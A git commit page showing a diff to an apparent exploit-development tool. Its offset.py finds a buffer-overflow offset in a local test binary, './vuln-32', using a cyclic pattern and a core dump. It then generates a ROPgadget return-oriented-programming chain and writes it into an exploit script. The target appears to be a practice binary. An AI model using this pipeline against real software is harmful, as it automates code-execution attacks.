Run ROPGadget with auto offset
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
parent
a8cbc66faf
commit
688bb5a1be
1
init.sh
1
init.sh
@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
|
||||
sudo apt-get --quiet --assume-yes install zsh
|
||||
|
||||
sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
|
||||
sudo apt-get --assume-yes --quiet install python
|
||||
python3 -m pip install --upgrade pip
|
||||
python3 -m pip install --upgrade pwntools
|
||||
|
||||
|
43
offset.py
43
offset.py
@ -2,26 +2,43 @@ from pwnlib.elf.corefile import Coredump
|
||||
from pwnlib.util.cyclic import cyclic, cyclic_find
|
||||
from pwnlib.util.packing import pack
|
||||
from pwnlib.tubes.process import process
|
||||
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
# TODO: command line arguments
|
||||
input_file = "input.txt"
|
||||
exec_name = "./vuln-32"
|
||||
core_file = "./core"
|
||||
|
||||
os.remove(core_file)
|
||||
def find_offset(exec_name):
|
||||
# TODO: command line arguments
|
||||
input_file = "input.txt"
|
||||
core_file = "./core"
|
||||
|
||||
# TODO Loop until a crash, increase payload size each iteration
|
||||
with open(input_file, "wb") as f:
|
||||
payload = cyclic(512)
|
||||
f.write(payload)
|
||||
os.remove(core_file)
|
||||
|
||||
process([exec_name, input_file]).wait()
|
||||
# TODO Loop until a crash, increase payload size each iteration
|
||||
with open(input_file, "wb") as f:
|
||||
payload = cyclic(512)
|
||||
f.write(payload)
|
||||
|
||||
core = Coredump('./core')
|
||||
process([exec_name, input_file]).wait()
|
||||
|
||||
assert pack(core.eip) in payload
|
||||
core = Coredump('./core')
|
||||
|
||||
print(cyclic_find(core.eip))
|
||||
assert pack(core.eip) in payload
|
||||
|
||||
os.remove(input_file)
|
||||
os.remove(input_file)
|
||||
|
||||
return cyclic_find(core.eip)
|
||||
|
||||
offset = find_offset(exec_name)
|
||||
|
||||
# print("\t# Padding goes here") <-- search for this
|
||||
# print("\tp = ''\n")
|
||||
|
||||
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
|
||||
stdout = result.stdout
|
||||
|
||||
|
||||
stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
|
||||
with open("test.py", "wb") as f:
|
||||
f.write(stdout)
|
||||
|
Loading…
Reference in New Issue
Block a user